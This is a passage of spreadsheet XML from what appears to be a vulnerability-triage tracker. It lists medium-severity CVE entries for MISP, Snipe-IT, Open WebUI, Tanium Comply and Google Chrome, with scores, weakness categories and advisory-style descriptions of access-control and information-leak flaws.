      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86347</t>
        </is>
      </c>
      <c r="D742" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E742" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L742" s="5" t="inlineStr"/>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr"/>
      <c r="Q742" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-862</t>
        </is>
      </c>
      <c r="R742" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP allow any authenticated user to access TemplatesController::uploadFile() because the ACL entry for templates/uploadFile used the wildcard *. This bypasses the intended role restrictions applied to neighboring template-management operations.
The upload handler accepts arbitrary content with only minimal checks and writes it into app/tmp/files/. A low-privileged or read-only user can therefore repeatedly upload files and consume server disk space without requiring perm_add or perm_template. The fix changes the ACL requirement from * to perm_add.
The commit also rules out stronger impacts: uploaded files receive random names, path traversal/predictable overwrite is not available, the temporary directory is outside the web root, and the files are not directly served over HTTP. Therefore, the issue should not be described as arbitrary file overwrite, stored XSS, or RCE.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86347</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86408</t>
        </is>
      </c>
      <c r="D743" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E743" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr"/>
      <c r="Q743" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R743" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP do not enforce parent-event visibility when serving cryptographic keys through CryptographicKeysController::view().
The vulnerable handler queried CryptographicKey directly using the supplied key ID and selected sensitive fields such as:
  *  
type
  *  
key_data
  *  
fingerprint
but did not fetch or authorize the associated parent event first.
The upstream commit explicitly states that cryptographicKeys/view could return a protected event’s signing key to any authenticated user.
The fix adds parent_id and parent_type to the lookup and then enforces authorization through the associated event using fetchSimpleEvent($user, parent_id). If the parent is not an Event, access is limited to site administrators.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86408</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86739</t>
        </is>
      </c>
      <c r="D744" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E744" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr"/>
      <c r="K744" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr"/>
      <c r="Q744" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="R744" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT 8.6.3 and earlier do not check the return value of Storage::put() when writing the signature PNG and the generated acceptance PDF in Account\AcceptanceController::store(). On filesystem drivers that return false instead of throwing on a write failure (for example the local disk with restrictive permissions, S3 with expired credentials, or a storage backend that is out of quota), execution continues into $acceptance-&gt;accept(), which sets accepted_at and the signature_filename/eula_filename fields, creates the 'accepted' action-log entry, and dispatches completion notifications even though the evidence files were never stored. The result is an acceptance record marked complete whose supporting evidence files do not exist, yielding a materially incomplete compliance artifact for EULA acknowledgement or equipment-receipt workflows. The condition is triggered when an authenticated user completes an acceptance while the storage backend is silently failing writes; an attacker cannot directly force the storage backend into that state. Fixed in Snipe-IT 8.7.0.</t>
        </is>
      </c>
      <c r="S744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86739</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86764</t>
        </is>
      </c>
      <c r="D745" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E745" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr"/>
      <c r="Q745" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R745" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT through 8.6.4 (fixed in 8.7.0) does not enforce the components.view permission on the authenticated endpoint GET /api/v1/hardware/&lt;asset-id&gt;/assigned/components. The endpoint authorizes only assets.view on the parent asset before returning linked component details; the components.view check is applied only to the response's available_actions.view flag and not to the returned data. As a result, an authenticated user holding only assets.view can enumerate component IDs, names, assigned quantities, and notes that are otherwise protected — the direct GET /api/v1/components/&lt;id&gt; endpoint correctly returns 403 Forbidden for such users.</t>
        </is>
      </c>
      <c r="S745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86764</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87014</t>
        </is>
      </c>
      <c r="D746" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E746" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F746" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr"/>
      <c r="Q746" s="5" t="inlineStr">
        <is>
          <t>CWE-613, CWE-863</t>
        </is>
      </c>
      <c r="R746" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.0 until 0.11.1, role synchronization in backend/open_webui/routers/auths.py and backend/open_webui/utils/oauth.py updated an administrator's database role without invalidating the user record cached by backend/open_webui/socket/main.py. An administrator demoted through a trusted role header or OAuth role mapping could keep an already-open Socket.IO connection and continue reading or editing every user's collaborative notes until that connection closed. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87014</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87073</t>
        </is>
      </c>
      <c r="D747" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E747" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F747" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr"/>
      <c r="K747" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr"/>
      <c r="Q747" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R747" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87073</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87429</t>
        </is>
      </c>
      <c r="D748" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E748" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr"/>
      <c r="Q748" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R748" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87429</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87436</t>
        </is>
      </c>
      <c r="D749" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E749" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr"/>
      <c r="K749" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr"/>
      <c r="Q749" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="R749" s="5" t="inlineStr">
        <is>
          <t>Incomplete cleanup in Browser in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87436</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87437</t>
        </is>
      </c>
      <c r="D750" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E750" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F750" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr"/>
      <c r="K750" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr"/>
      <c r="Q750" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R750" s="5" t="inlineStr">
        <is>
          <t>Information leak in Frames in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87437</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87441</t>
        </is>
      </c>
      <c r="D751" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E751" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F751" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr"/>
      <c r="Q751" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R751" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87441</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87443</t>
        </is>
      </c>
      <c r="D752" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E752" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F752" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr"/>
      <c r="Q752" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R752" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Actor in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87443</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87446</t>
        </is>
      </c>
      <c r="D753" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E753" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F753" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L753" s="5" t="inlineStr"/>
      <c r="M753" s="5" t="inlineStr"/>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P753" s="5" t="inlineStr"/>
      <c r="Q753" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="R753" s="5" t="inlineStr">
        <is>
          <t>Incomplete cleanup in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87446</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87447</t>
        </is>
      </c>
      <c r="D754" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E754" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F754" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L754" s="5" t="inlineStr"/>
      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr"/>
      <c r="Q754" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R754" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Network in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted Chrome extension. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87447</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87454</t>
        </is>
      </c>
      <c r="D755" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E755" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F755" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L755" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr"/>
      <c r="Q755" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R755" s="5" t="inlineStr">
        <is>
          <t>Information leak in Enterprise in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87454</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87459</t>
        </is>
      </c>
      <c r="D756" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E756" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F756" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr"/>
      <c r="Q756" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="R756" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Select in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87459</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87468</t>
        </is>
      </c>
      <c r="D757" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E757" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F757" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L757" s="5" t="inlineStr"/>
      <c r="M757" s="5" t="inlineStr"/>
      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr"/>
      <c r="Q757" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R757" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Isolated in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87468</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
